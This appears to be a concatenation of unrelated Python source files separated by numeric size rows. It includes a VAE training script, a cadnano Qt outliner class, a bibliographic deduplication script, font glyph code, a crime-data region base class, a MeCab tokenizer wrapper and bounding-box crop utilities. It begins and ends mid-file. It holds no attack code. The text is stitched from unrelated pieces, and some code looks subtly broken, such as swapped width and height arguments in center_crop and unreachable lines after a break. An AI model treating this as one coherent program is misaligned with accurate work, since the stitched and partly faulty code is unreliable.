reshape([FLAGS.n_data, 28, 28, 1]).
conv2d(5, 32, stride=2).
conv2d(5, 64, stride=2).
conv2d(5, 128, edges='VALID').
dropout(0.9).
flatten().
fully_connected(self.num_vars * 2, activation_fn=None)).tensor
mean = params[:, :self.num_vars]
stddev = tf.sqrt(tf.exp(params[:, self.num_vars:]))
return [mean, stddev]
def sample_noise(self, size):
"""
eps = sample_noise() ~ s(eps)
s.t. z = reparam(eps; lambda) ~ q(z | lambda)
"""
return tf.random_normal(size)
Normal.mapping = mapping
Normal.sample_noise = sample_noise
class NormalBernoulli:
def __init__(self, num_vars):
self.num_vars = num_vars
def mapping(self, z):
"""
p = varphi(z)
"""
with pt.defaults_scope(activation_fn=tf.nn.elu,
batch_normalize=True,
learned_moments_update_rate=0.0003,
variance_epsilon=0.001,
scale_after_normalization=True):
return (pt.wrap(z).
reshape([FLAGS.n_data, 1, 1, self.num_vars]).
deconv2d(3, 128, edges='VALID').
deconv2d(5, 64, edges='VALID').
deconv2d(5, 32, stride=2).
deconv2d(5, 1, stride=2, activation_fn=tf.nn.sigmoid).
flatten()).tensor
def log_likelihood(self, x, z):
"""
log p(x | z) = log Bernoulli(x | p = varphi(z))
"""
p = self.mapping(z)
return x * tf.log(p + 1e-8) + (1.0 - x) * tf.log(1.0 - p + 1e-8)
def sample_prior(self, size):
"""
p ~ some complex distribution induced by
z ~ N(0, 1), p = phi(z)
"""
z = tf.random_normal(size)
return self.mapping(z)
class Data:
def __init__(self, data):
self.mnist = data
def sample(self, size):
x_batch, _ = mnist.train.next_batch(size)
return x_batch
ed.set_seed(42)
model = NormalBernoulli(FLAGS.num_vars)
# TODO This family is not currently amenable to the variational construction.
variational = Normal(FLAGS.num_vars)
if not os.path.exists(FLAGS.data_directory):
os.makedirs(FLAGS.data_directory)
mnist = input_data.read_data_sets(FLAGS.data_directory, one_hot=True)
data = Data(mnist)
inference = ed.VAE(model, variational, data)
sess = inference.initialize(n_data=FLAGS.n_data)
with tf.variable_scope("model", reuse=True) as scope:
p_rep = model.sample_prior([FLAGS.n_data, FLAGS.num_vars])
for epoch in range(FLAGS.n_epoch):
avg_loss = 0.0
widgets = ["epoch #%d|" % epoch, Percentage(), Bar(), ETA()]
pbar = ProgressBar(FLAGS.n_iter_per_epoch, widgets=widgets)
pbar.start()
for t in range(FLAGS.n_iter_per_epoch):
pbar.update(t)
loss = inference.update(sess)
avg_loss += loss
# Take average of all ELBOs during the epoch.
avg_loss = avg_loss / FLAGS.n_iter_per_epoch
# Take average over each data point (pixel), where each image has
# 28*28 pixels.
avg_loss = avg_loss / (28 * 28 * FLAGS.n_data)
# Print a lower bound to the average marginal likelihood for a single pixel.
print("log p(x) >= %f" % avg_loss)
imgs = sess.run(p_rep)
for b in range(FLAGS.n_data):
if not os.path.exists(FLAGS.img_directory):
os.makedirs(FLAGS.img_directory)
imsave(os.path.join(FLAGS.img_directory, '%d.png') % b,
imgs[b].reshape(28, 28))
| 5,170 | 1,790 |
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QTreeWidgetItem
from cadnano.gui.palette import getBrushObj
from . import outlinerstyles as styles
NAME_COL = 0
LOCKED_COL = 1
VISIBLE_COL = 2
COLOR_COL = 3
LEAF_FLAGS = (Qt.ItemIsSelectable | Qt.ItemIsEditable |
Qt.ItemIsDragEnabled |
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled) # 55 + 8 = 63
DISABLE_FLAGS = Qt.NoItemFlags # 0
ROOT_FLAGS = ( Qt.ItemIsDragEnabled | Qt.ItemIsDropEnabled |
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled ) # 60
class CNOutlinerItem(QTreeWidgetItem):
PROPERTIES = {'name': NAME_COL, 'is_locked': LOCKED_COL, 'is_visible': VISIBLE_COL, 'color': COLOR_COL}
CAN_NAME_EDIT = True
def __init__(self, cn_model, parent):
super(QTreeWidgetItem, self).__init__(parent, QTreeWidgetItem.UserType)
self._cn_model = cn_model
name = cn_model.getName()
color = cn_model.getColor()
self.setData(NAME_COL, Qt.EditRole, name)
self.setData(LOCKED_COL, Qt.EditRole, False) # is_visible
self.setData(VISIBLE_COL, Qt.EditRole, True) # is_visible
self.setData(COLOR_COL, Qt.EditRole, color)
# end def
### PRIVATE SUPPORT METHODS ###
def __hash__(self):
""" necessary as CNOutlinerItem as a base class is unhashable
but necessary due to __init__ arg differences for whatever reason
"""
return hash(self._cn_model)
### PUBLIC SUPPORT METHODS ###
def itemType(self):
pass
# end def
def cnModel(self):
return self._cn_model
# end def
def getColor(self):
return self._cn_model.getProperty('color')
# end def
def createRootPartItem(self, item_name, parent):
""" use this for sub-lists for part items
"""
return RootPartItem(self._cn_model, item_name, parent)
# end def
def updateCNModel(self):
# this works only for color. uncomment below to generalize to properties
# print("outliner %s - updateCNModel" % (str(type(self))))
cn_model = self._cn_model
name = self.data(NAME_COL, Qt.DisplayRole)
color = self.data(COLOR_COL, Qt.DisplayRole)
is_visible = self.data(VISIBLE_COL, Qt.DisplayRole)
mname, mcolor, mvisible = cn_model.getOutlineProperties()
if name is not None and name != mname:
cn_model.setProperty('name', name)
if color is not None and color != mcolor:
cn_model.setProperty('color', color)
if is_visible is not None and is_visible != mvisible:
cn_model.setProperty('is_visible', is_visible)
# end def
def setValue(self, key, value):
# cn_model = self._model_part
if key == 'name':
name = self.data(NAME_COL, Qt.DisplayRole)
if name != value:
# print("setting name", self.isSelected())
self.setData(NAME_COL, Qt.EditRole, value)
elif key == 'color':
color = self.data(COLOR_COL, Qt.DisplayRole)
if color != value:
self.setData(COLOR_COL, Qt.EditRole, value)
elif key == 'is_locked':
is_locked = self.data(LOCKED_COL, Qt.DisplayRole)
if is_locked != value:
self.setData(LOCKED_COL, Qt.EditRole, value)
elif key == 'is_visible':
is_visible = self.data(VISIBLE_COL, Qt.DisplayRole)
if is_visible != value:
self.setData(VISIBLE_COL, Qt.EditRole, value)
else:
"property not supported"
# pass
# raise KeyError("No property %s in cn_model" % (key))
# end def
def activate(self):
self.setBackground(NAME_COL, getBrushObj(styles.ACTIVE_COLOR))
self.is_active = True
# end def
def deactivate(self):
# print("should deactivate outliner Part")
self.setBackground(NAME_COL, getBrushObj(styles.INACTIVE_COLOR))
self.is_active = False
# end def
# end class
class RootPartItem(QTreeWidgetItem):
def __init__(self, model_part, item_name, parent):
super(QTreeWidgetItem, self).__init__(parent, QTreeWidgetItem.UserType)
self._cn_model = model_part
self.item_name = item_name
self.setData(NAME_COL, Qt.EditRole, item_name)
self.setData(LOCKED_COL, Qt.EditRole, False) # is_locked
self.setData(VISIBLE_COL, Qt.EditRole, True) # is_visible
self.setData(COLOR_COL, Qt.EditRole, "#ffffff") # color
# self.setFlags(self.flags() & ~Qt.ItemIsSelectable)
self.setFlags(ROOT_FLAGS)
self.setExpanded(True)
# end def
def __repr__(self):
return "RootPartItem %s: for %s" % (self.item_name,
self._cn_model.getProperty('name'))
# end def
def part(self):
return self._cn_model
def getColor(self):
return "#ffffff"
| 4,998 | 1,602 |
import pandas as pd
import re
from fuzzywuzzy import fuzz
from tqdm import tqdm
from datetime import date
import os
#os.chdir("C:\\Users\\lm16564\\OneDrive - University of Bristol\\Documents\\rrr\\COVID_suicide_living")
def fuzzymatch(a, b, min_match):
if fuzz.ratio(a, b) > min_match: # matching ore than specified ratio
# print("-------match to {} ratio---------".format(min_match))
# print(a)
# print(b)
# print(fuzz.ratio(a, b))
return True
return False # match is less, therefore text is too different
def rowmatch(row, indexes, mydict, min_match_title, min_match_abstrct):
try:
t1 = row["title"].strip().lower() # remove trailing spaces and lower the letters
if t1=="":
return False, None
except:
return False, None
try:
a1 = row["abstract"].strip().lower()[:495]
except:
a1 = ""
match = False
index = None # save location of the duplicate in master df
if t1 != "": # only attempt matching if there is a title to start with.
for i in indexes: # attempt to match this title with every title in the master frame
try:
t2 = mydict["title"][i].strip().lower() # remove trailing spaces and lower the letters
except:
t2 = ""
match = fuzzymatch(t1, t2, min_match_title)
if match: # continue only if titles are matching
if a1 != "":
try:
a2 = mydict["abstract"][i].strip().lower()[:495]
except:
a2 = ""
# print("matched title but found no second abstract")
# print(t1)
# print(t2)
index = i
break
match = fuzzymatch(a1, a2, min_match_abstrct)
if match:
# print("Matched on full record")
# print(t1)
# print(t2)
# print(a1)
# print(a2)
index = i
break
else:
index = None
else:
# print("Matched title, but found no first abstract, returning True")#for e.g. dblp records there are no abstracts, but we still want to deduplicate and get rid of them!
# print(t1)
# print(t2)
# print("-------")
index = i
break
return match, index # is true if match was found and loop broken. Is false if all rows were checked and fuzzy matching was below the threshold
def dedupe_loop_within(wos, name, min_match_title, min_match_abstract):
wos_orig = wos.copy()
wos_orig["Deduplication_Notes"] = ["" for d in wos_orig["title"].values] # has no abstracts
orig_length = wos.shape[0]
print("Deduplicating {} data".format(name))
new_rows = []
counter = 0
masterdf = pd.DataFrame(columns=wos.columns.values)
#
disagreements=[]
all_dupes=[]
pd.set_option("display.max_colwidth", 5000)
with tqdm(total=wos.shape[0]) as pbar:
for i, row in wos.iterrows():
mydict = masterdf.to_dict()
indexes = list(masterdf.index.values) # iterate over dict rather than df for 6 times speedup!
match, index = rowmatch(row, indexes, mydict, min_match_title, min_match_abstract)
if match:
all_dupes.append(row)
all_dupes.append(masterdf.loc[index])
# print(index)
# print(masterdf.at[index, "Deduplication_Notes"])
init1=False
init2=False
if row["initial_decision"] == "Include" or pd.notna(row["expert_decision"]):
init1=True
if masterdf.loc[index]["initial_decision"] == "Include" or pd.notna(masterdf.loc[index]["expert_decision"]):
init2 = True
if init1 != init2:
#print("Mismatch!")
disagreements.append(row)
disagreements.append(masterdf.loc[index])
# wos_orig.at[i, "Deduplication_Notes"] = "{} CHECK DUPLICATE STATUS [SOURCE:{} {}]".format(
# str(wos_orig.at[index, "Deduplication_Notes"]), str(masterdf.loc[index]["source"]),
# re.sub(r"\s+", " ",
# masterdf.loc[index].to_string().replace("\n", "; "))).strip() # modift masterdf in place
# print(masterdf.at[index, "Deduplication_Notes"])
counter += 1
else:
masterdf = masterdf.append(row, ignore_index=True)
# print(masterdf.head())
pbar.update(1)
print(
"Adding {} rows out of {} to master data and identified {} as duplicates".format(masterdf.shape[0], orig_length,
counter))
print("Writing disagreements...")
dis=pd.DataFrame(disagreements, columns=wos.columns.values)
dis.to_csv("data//results//disagreements.csv")
print("Writing full deduplication of previous data frame (danger!)...")
dis = pd.DataFrame(all_dupes, columns=wos.columns.values)
dis.to_csv("data//results//dupes_previous.csv")
# masterdf.to_csv("all_results.csv")
# wos_orig.to_csv( "all_results_with_duplicates-{}.csv".format(date.today())) # save version that has dupes in it
# masterdf.to_csv(os.path.join("results", "all_results.csv"))
# wos_orig.to_csv(os.path.join("results", "all_results_with_duplicates-{}.csv".format(
# date.today()))) # save version that has dupes in it
return masterdf
def dedupe_loop_additional(original, new, name, min_match_title, min_match_abstract):
#
#Function to loop the new data, and add columns of new data only if they are not a duplicate already inside the data frame
#Also stores duplicates in a de-duplication master list, if they are not 100% replications of a previous duplicate.
#
#
print("Deduping additional dataframe")
new_rows = []
counter = 0
equals=0
masterdf = original.copy()
new_deduped=pd.DataFrame(columns=list(new.columns))
#
dupe_list=[]
new=new.fillna("")
masterdf = masterdf.fillna("")
pd.set_option("display.max_colwidth", 5000)#otherwise cell contents are cut away
print("Iterating {} rows of new data to find duplicates".format(new.shape[0]))
with tqdm(total=new.shape[0]) as pbar:
for i, row in new.iterrows():
mydict = masterdf.to_dict()
indexes = list(masterdf.index.values) # iterate over dict rather than df for 6 times speedup!
# print(row.to_string())
match, index = rowmatch(row, indexes, mydict, min_match_title, min_match_abstract)
if match:
def dupe_report(new, orig):
id=orig["ID"]
source_orig = str(orig["source"]).lower()
source_new = str(new["source"]).lower()
title_orig=str(orig["title"]).strip()
title_new = str(new["title"]).strip()
abstract_new = str(new["abstract"]).strip()
abstract_orig = str(orig["abstract"]).strip()
author_new = str(new["authors"]).strip()
author_orig = str(orig["authors"]).strip()
link_new = str(new["link"]).strip()
link_orig = str(orig["link"]).strip()
date_added=date.today()
#decision_orig=orig["initial_decision"]
if id== "nan" or id =="NaN" or id == "" or pd.isna(id) or id == "NA":#do not append this value, its already added to the new results, but has no ID assigned yet.
return "equal"
if source_new == source_orig and title_new == title_orig and abstract_new == abstract_orig and link_new == link_orig:#exact duplicates are not needed
#print("Direct duplicate: {} {}; {} {}; {} {}".format(source_orig,source_new,link_orig,link_new,title_orig,title_new))
return "equal"
else:
return pd.Series([id,source_orig,source_new,title_orig,title_new,abstract_orig,abstract_new,author_orig,author_new,link_orig,link_new, date_added], index=["ID","source original", "source new", "title original","title new","abstract original","abstract new","author original","author new","link original","link new", "date added"])
ret= dupe_report(row, masterdf.loc[index])
if type(ret) == pd.Series:
dupe_list.append(ret)#add a duplication report to the list
counter += 1
else:
equals += 1
else:
masterdf = masterdf.append(row, ignore_index=True)#add new entry to master data becasue it is not a duplicate
new_deduped = new_deduped.append(row, ignore_index=True)#add new entry to a data fram that just consists of new entries
# print(masterdf.head())
pbar.update(1)
print("Adding {} rows out of {} to master data and identified {} as duplicates with minor differences (the other {} were exactly identical and are discarded)".format(new_deduped.shape[0], new.shape[0],counter, equals))
print("Replacing NA with empty spaces...")
new_deduped= new_deduped.fillna("")
new_deduped['link'] = new_deduped['link'].apply(lambda x: re.sub("https://www.doi.org", "https://doi.org", x))
new_deduped.to_csv(name)
print("Saved the new, deduplicated rows as {}".format(name))
#################Deduplication report: append new duplicates to it
dup_df=pd.read_csv("data\\results\\dedupe_report.csv")
dup_df=dup_df.replace("NA", "")
dup_df = dup_df.fillna("")
counter=0
#print(len(dupe_list))
print("Checking if any new results need to be added to the deduplication master list:")
with tqdm(total=len(dupe_list)) as pbar:
for e in dupe_list:
dup_df = dup_df.fillna("")
ddf= dup_df[(dup_df['ID']==e[0]) & (dup_df['source original'] == e[1]) & (dup_df['source new'] == e[2]) & (dup_df['abstract new'] == e[6]) & (dup_df['title new'] == e[4])]
if ddf.shape[0]== 0:#checking if this record is already stored as duplicate - since many records are retrieved over and over again
dup_df = dup_df.append(e, ignore_index=True)
counter += 1
# print("found new: {}".format(e[0]))
# print("Test: {}".format(dup_df[dup_df['ID']==e[0]].shape[0]))
# print(e[0])
# print(dup_df['ID'].values[:100])
#else:
#print("Duplicate in dup_df")
pbar.update(1)
dup_df.to_csv("data\\results\\dedupe_report.csv",index=False)
print("Added {} records to the dedupe_report.csv".format(counter))
def dedupe_me(path, match_title, match_abstract, path_2=""):
df = pd.read_csv(path)
df = df.replace("NA", "")
df = df.replace("nan", "")
df= df.fillna("")
print("Reading the file all_results_tmp.csv that contains the previous results. It has {} records, and its {} column names are {}".format(df.shape[0], len(list(df.columns)), list(df.columns)))
if path_2 != "":
df_toadd = pd.read_csv(path_2)
df_toadd = df_toadd.replace("NA", "")
df_toadd = df_toadd.replace("nan", "")
df_toadd = df_toadd.fillna("")
print("Reading the file new_results.csv that contains the new results. It has {} records, and its {} column names are {}".format(df_toadd.shape[0], len(list(df.columns)), list(df_toadd.columns)))
dedupe_loop_additional(df, df_toadd, "data\\results\\new_and_deduped.csv", match_title, match_abstract)
else:
#use this to deduplicate results within one single spreadsheet - not needed for LSR app since deduplication hapens based on a deduplicated database+ newly added records
dedupe_loop_within(df, "data\\results\\new_and_deduped.csv", match_title, match_abstract)
path = "data\\results\\all_results_tmp.csv"#is previous results but with some replacements
path_new = "data\\results\\new_results.csv"
if not os.path.exists("data\\results\\dedupe_report.csv"):
dupes=pd.DataFrame(columns=["ID","source original", "source new","title original","title new","abstract original","abstract new","author original","author new","link original","link new", "date added"])
dupes.to_csv("data\\results\\dedupe_report.csv",index=False)
#alternative if you have problems with relative and absolute paths, try this! its the OS modeule that has an option to grab the current working directorys absolute path:
dedupe_me(path, 95, 90, path_new) # use this when adding data. creates the file "results/all_results_updated.csv"
#
#Code below to find screener conflicts and total number of previous duplicates. ote: need to retain column 'initial_decision' from all_results in order to run this code!
#
# print("Finding screener-conflicts within all_results_tmp.csv...")
# wos=pd.read_csv("data\\results\\all_results_tmp.csv")
# dedupe_loop_within(wos, "data\\results\\new_and_deduped.csv", 95, 90)
| 13,579 | 4,090 |
#Move to class variable of Glyph object
idDict = {0:'exclam', 1:'quotedbl', 2:'numbersign', 3:'dollar',
4:'percent', 5:'ampersand', 6:'quotesingle', 7:'parenleft',
8:'parenright', 9:'asterisk', 10:'plus', 11:'comma',
12:'hyphen', 13:'period', 14:'slash', 15:'zero',
16:'one', 17:'two', 18:'three', 19:'four',
20:'five', 21:'six', 22:'seven', 23:'eight',
24:'nine', 25:'colon', 26:'semicolon', 27:'less',
28:'equal', 29:'greater', 30:'question', 31:'at',
32:'A', 33:'B', 34:'C', 35:'D',
36:'E', 37:'F', 38:'G', 39:'H',
40:'I',41:'J', 42:'K', 43:'L',
44:'M', 45:'N', 46:'O', 47:'P',
48:'Q', 49:'R', 50:'S', 51:'T',
52:'U', 53:'V', 54:'W', 55:'X',
56:'Y', 57:'Z', 58:'bracketleft', 59:'backslash',
60:'bracketright', 61:'asciicircum', 62:'underscore', 63:'grave',
64:'a', 65:'b', 66:'c', 67:'d',
68:'e', 69:'f', 70:'g', 71:'h',
72:'i', 73:'j', 74:'k', 75:'l',
76:'m', 77:'n', 78:'o', 79:'p',
80:'q', 81:'r', 82:'s', 83:'t',
84:'u', 85:'v', 86:'w', 87:'x',
88:'y', 89:'z', 90:'braceleft', 91:'bar',
92:'braceright', 93:'asciitilde'
}
metricsDict = {0:[38,int(-3),145,797], 1:[28,542,246,797],
2:[22,0,496,783], 3:[41,int(-20),351,803],
4:[46,int(-8),565,790], 5:[33,-10,418,823],
6:[28,542,110,797], 7:[87,int(-210),273,959],
8:[14,int(-210),200,959], 9:[32,382,409,783],
10:[46,160,485,599], 11:[19,int(-149),132,107],
12:[27,343,278,416], 13:[28,-3,132,107],
14:[6,int(-120), 347, 869], 15:[41,-14,363,797],
16:[15,0,191,783], 17:[29,0,340,797],
18:[33,-14,352,797], 19:[22,0,368,783],
20:[30,int(-14),341,783], 21:[41,int(-14),352,797],
22:[22,0,305,783], 23:[28,int(-14),355,797],
24:[41,int(-14),352,797], 25:[51,47,155,441],
26:[42,int(-99),155,441], 27:[46,182,485,576],
28:[46,243,485,515], 29:[46,182,485,576],
30:[26,int(-3),331,803], 31:[31,int(-189),654,707],
32:[18,0,377,783], 33:[46,0,369,783],
34:[41,int(-14),352,797], 35:[46,0,364,783],
36:[46,0,305,783], 37:[46,0,316,783],
38:[41,int(-14),352,797], 39:[46,0,369,783],
40:[46,0,138,783], 41:[20,int(-14),331,783],
42:[46,0,374,783], 43:[46,0,285,783],
44:[46,0,489,783], 45:[46,0,359,783],
46:[41,int(-14),363,797], 47:[46,0,364,783],
48:[41,int(-89),398,797], 49:[46,0,366,783],
50:[25,int(-14),347,797], 51:[20,0,288,783],
52:[44,int(-14),366,783], 53:[18,0,377,783],
54:[22,0,555,783], 55:[13,0,395,783],
56:[13,0,399,783], 57:[28,0,332,783],
58:[87,int(-210),273,959], 59:[6,-120,347,869],
60:[14,int(-210),200,959], 61:[29,344,423,783],
62:[0,int(-125),428,int(-66)], 63:[75,659,260,817],
64:[27,int(-8),340,619], 65:[46,int(-8),359,815],
66:[41,int(-8),337,619], 67:[41,int(-8),354,815],
68:[41,int(-8),339,619], 69:[12,0,303,823],
70:[3,int(-171),386,619], 71:[46,0,359,815],
72:[38,0,142,806], 73:[int(-71),int(-183),158,806],
74:[46,0,362,815], 75:[46,0,135,815],
76:[46,0,567,619], 77:[46,0,359,619],
78:[41,int(-8),345,619], 79:[46,int(-171),359,619],
80:[41,int(-171),354,619], 81:[46,0,301,619],
82:[27,int(-8),337,619], 83:[12,int(-8),298,754],
84:[44,int(-8),353,611], 85:[19,0,360,611],
86:[22,0,520,611], 87:[13,0,404,611],
88:[44,int(-171),353,611], 89:[27,0,321,611],
90:[32,int(-210),273,959], 91:[87,-160,160,909],
92:[14,int(-210),255,959], 93:[46,291,485,466]
}
#When you get to clockwise ordering...
class Glyph:
#Path is the list of contour paths that define a glyph.
def __init__(self, path, id):
self.id = int(id)
self.path = path
self.nContours = len(path)
self.name = idDict[id]
self.metrics = metricsDict[id]
#Find sum of all points in a contour. Used to determine counter/clockwise ordering.
def pointSum(self, contour, index):
point = contour[index]
if index < len(contour)-1:
nextPoint = contour[index+1]
ret = (nextPoint[0]-point[0])*(nextPoint[1]+point[1])
return ret + self.pointSum(contour, index+1)
else:
nextPoint = contour[0]
ret = (nextPoint[0]-point[0])*(nextPoint[1]+point[1])
return ret
#Bring path into correct ordering
#Path => Contours => points => (x,y)
def align(self):
#Obtain first point
try:
iPoint = self.path[0][0]
for conIndex in range(len(self.path)):
contour = self.path[conIndex]
total = self.pointSum(contour, 0) #Recursive sum function
if total < 0:
self.path[conIndex] = contour[::-1]
except:
None
#Bring path vertices into ratio of font metrics.
#Canvas metrics are 1100x600 pixels.
#Consider importing glyph sizes? Perhaps write another dimension dictionary?
def scale(self):
xmin = self.metrics[0]
ymin = self.metrics[1]
xMax = self.metrics[2]
yMax = self.metrics[3]
largest = 0
contour = []
for conIndex in range(len(self.path)):
contourXMax = 1
contourYMax = 1
contour = self.path[conIndex]
for pIndex in range(len(contour)):
if contour[pIndex][0] > contourXMax:
contourXMax = contour[pIndex][0]
if contour[pIndex][1] > contourYMax:
contourYMax = contour[pIndex][1]
for pIndex in range(len(contour)):
x = int((contour[pIndex][0]/contourXMax)*(xMax - xmin))
y = int((600 - contour[pIndex][1]))
y = int((y/contourYMax)*(yMax-ymin))
contour[pIndex] = (x,y)
#Writes a string for the contour data of a glyph file.
def writeFormat(self):
ret = ""
for contour in self.path:
ret += "\t\t<contour>\n"
for point in contour:
ret += ("\t\t\t<pt x=\"" + str(point[0]) +"\" y=\"" + str(point[1]) + "\" on=\"1\"/>\n")
ret += "\t\t</contour>\n"
ret += "\t\t<instructions>\n"
ret += "\t\t\t<assembly>\n\t\t\t</assembly>\n"
ret += "\t\t</instructions>\n"
return ret
| 6,922 | 3,335 |
# Copyright 2014 Peter Griess
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Base class for region implementations.
'''
import crimedb.geocoding
import io
import json
import os
import os.path
import pkg_resources
import shapely.geometry
class Region(object):
'''
Base class for all regions.
Provides support for common operations and provides a common API for use in
other code.
'''
def __init__(self, name, work_dir=None, shape=None, geocoder=None):
self.name = name
self.work_dir = work_dir
if shape is None:
pkg = 'crimedb.regions.__data__'
rsrc = '{}.geojson'.format(name)
with pkg_resources.resource_stream(pkg, rsrc) as f:
tf = io.TextIOWrapper(f, encoding='utf-8', errors='replace')
shape = shapely.geometry.shape(json.load(tf))
self.shape = shape
if geocoder is None:
geocoder = crimedb.geocoding.geocode_null
self.geocoder = geocoder
self.human_name = None
self.human_url = None
def download(self):
'''
Download any new crime incidents.
This requires network access and may take along time to execute
depending on the specifics of the region implementation (some regions
have faster/slower access methods).
'''
pass
def process(self):
'''
Process any already-downloaded incidents.
This will iterate over all downloaded incidents and attempt to ensure
that they've been correctly converted into a CrimeDB incident. This may
involve geocoding, filtering out of invalid incidents, and other work.
This process should be interruptable / restartable. In particular, some
geocoders are flakey so we should be able to run-execute the process()
method multiple times to complete geocoding of incidents that dind't
complete previously.
'''
pass
def crimes(self):
'''
Iterator that yields crimedb.core.Crime objects.
'''
pass
def _cache_dir(self):
'''
Return the directory to be used for caching raw files. Creates it if
necessary.
'''
cache_dir = os.path.join(self.work_dir, 'raw')
os.makedirs(cache_dir, exist_ok=True)
return cache_dir
def _intermediate_dir(self):
'''
Return the directory to be used for storing intermediate files. Creates
it if necessary.
'''
int_dir = os.path.join(self.work_dir, 'intermediate')
os.makedirs(int_dir, exist_ok=True)
return int_dir
| 3,170 | 882 |
from abc import ABC, abstractmethod
from typing import List
import MeCab
class PreTokenizer(ABC):
"""AutoTokenizer(bert-base-multilingual-cased)によって分かち書きをする前に、
前処理としてかける分かち書きのための抽象クラス
これを行わないと場合によっては、
「〇〇は3月2日に開催した」 -> 「〇 〇 は3 月 2 日 に 開 催 した」のように、「は3」のような
単語になってしまい、その後の分類タスクで悪影響が起きてしまう
"""
@abstractmethod
def parse(self, text: str) -> List[str]:
raise NotImplementedError
class MeCabPreTokenizer(PreTokenizer):
"""AutoTokenizerによって、分かち書きをする前にMeCabを使用して分かち書きをする場合に使用するクラス"""
def __init__(self):
self.tagger = MeCab.Tagger("-Owakati")
def parse(self, text: str) -> List[str]:
return self.tagger.parse(text).split()
| 689 | 371 |
from typing import List, Dict, Sequence, Union, Tuple
from numbers import Number
import random
import numpy as np
from toolz import curry
from toolz.curried import get
from common import _tuple
__all__ = [
"resize", "resized_crop", "center_crop", "drop_boundary_bboxes",
"to_absolute_coords", "to_percent_coords", "hflip", "hflip2",
"vflip", "vflip2", "random_sample_crop", "move"
]
def iou_1m(box, boxes):
r"""
Calculates one-to-many ious.
Parameters
----------
box : ``Sequences[Number]``
A bounding box.
boxes : ``array_like``
Many bounding boxes.
Returns
-------
ious : ``array_like``
IoUs between the box and boxes.
"""
xi1 = np.maximum(boxes[..., 0], box[0])
yi1 = np.maximum(boxes[..., 1], box[1])
xi2 = np.minimum(boxes[..., 2], box[2])
yi2 = np.minimum(boxes[..., 3], box[3])
xdiff = xi2 - xi1
ydiff = yi2 - yi1
inter_area = xdiff * ydiff
box_area = (box[2] - box[0]) * (box[3] - box[1])
boxes_area = (boxes[..., 2] - boxes[..., 0]) * \
(boxes[..., 3] - boxes[..., 1])
union_area = boxes_area + box_area - inter_area
iou = inter_area / union_area
iou[xdiff < 0] = 0
iou[ydiff < 0] = 0
return iou
def random_sample_crop(anns, size, min_iou, min_ar, max_ar, max_attemps=50):
"""
Crop the given PIL Image to random size and aspect ratio.
A crop of random size (default: of 0.08 to 1.0) of the original size and a random
aspect ratio (default: of 3/4 to 4/3) of the original aspect ratio is made. This crop
is finally resized to given size.
This is popularly used to train the Inception networks.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
min_iou : ``float``
Minimal iou between the objects and the cropped image.
min_ar : ``Number``
Minimal aspect ratio.
max_ar : ``Number``
Maximum aspect ratio.
max_attemps: ``int``
Maximum attemps to try.
"""
width, height = size
bboxes = np.stack([ann['bbox'] for ann in anns])
bboxes[:, 2:] += bboxes[:, :2]
for _ in range(max_attemps):
w = random.uniform(0.3 * width, width)
h = random.uniform(0.3 * height, height)
if h / w < min_ar or h / w > max_ar:
continue
l = random.uniform(0, width - w)
t = random.uniform(0, height - h)
r = l + w
b = t + h
patch = np.array([l, t, r, b])
ious = iou_1m(patch, bboxes)
if ious.min() < min_iou:
continue
centers = (bboxes[:, :2] + bboxes[:, 2:]) / 2.0
mask = (l < centers[:, 0]) & (centers[:, 0] < r) & (
t < centers[:, 1]) & (centers[:, 1] < b)
if not mask.any():
continue
indices = np.nonzero(mask)[0].tolist()
return get(indices, anns), l, t, w, h
return None
@curry
def resized_crop(anns, left, upper, width, height, output_size, min_area_frac):
anns = crop(anns, left, upper, width, height, min_area_frac)
size = (width, height)
# if drop:
# anns = drop_boundary_bboxes(anns, size)
anns = resize(anns, size, output_size)
return anns
@curry
def drop_boundary_bboxes(anns, size):
r"""
Drop bounding boxes whose centers are out of the image boundary.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
width, height = size
new_anns = []
for ann in anns:
l, t, w, h = ann['bbox']
x = (l + w) / 2.
y = (t + h) / 2.
if 0 <= x <= width and 0 <= y <= height:
new_anns.append({**ann, "bbox": [l, t, w, h]})
return new_anns
@curry
def center_crop(anns, size, output_size):
r"""
Crops the bounding boxes of the given PIL Image at the center.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
output_size : ``Union[Number, Sequence[int]]``
Desired output size of the crop. If size is an int instead of sequence like (w, h),
a square crop (size, size) is made.
"""
output_size = _tuple(output_size, 2)
output_size = tuple(int(x) for x in output_size)
w, h = size
th, tw = output_size
upper = int(round((h - th) / 2.))
left = int(round((w - tw) / 2.))
return crop(anns, left, upper, th, tw)
@curry
def crop(anns, left, upper, width, height, minimal_area_fraction=0.25):
r"""
Crop the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
left: ``int``
Left pixel coordinate.
upper: ``int``
Upper pixel coordinate.
width: ``int``
Width of the cropped image.
height: ``int``
Height of the cropped image.
minimal_area_fraction : ``int``
Minimal area fraction requirement.
"""
new_anns = []
for ann in anns:
l, t, w, h = ann['bbox']
area = w * h
l -= left
t -= upper
if l + w >= 0 and l <= width and t + h >= 0 and t <= height:
if l < 0:
w += l
l = 0
if t < 0:
h += t
t = 0
w = min(width - l, w)
h = min(height - t, h)
if w * h < area * minimal_area_fraction:
continue
new_anns.append({**ann, "bbox": [l, t, w, h]})
return new_anns
@curry
def resize(anns, size, output_size):
"""
Parameters
----------
anns : List[Dict]
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : Sequence[int]
Size of the original image.
output_size : Union[Number, Sequence[int]]
Desired output size. If size is a sequence like (w, h), the output size will be matched to this.
If size is an int, the smaller edge of the image will be matched to this number maintaing
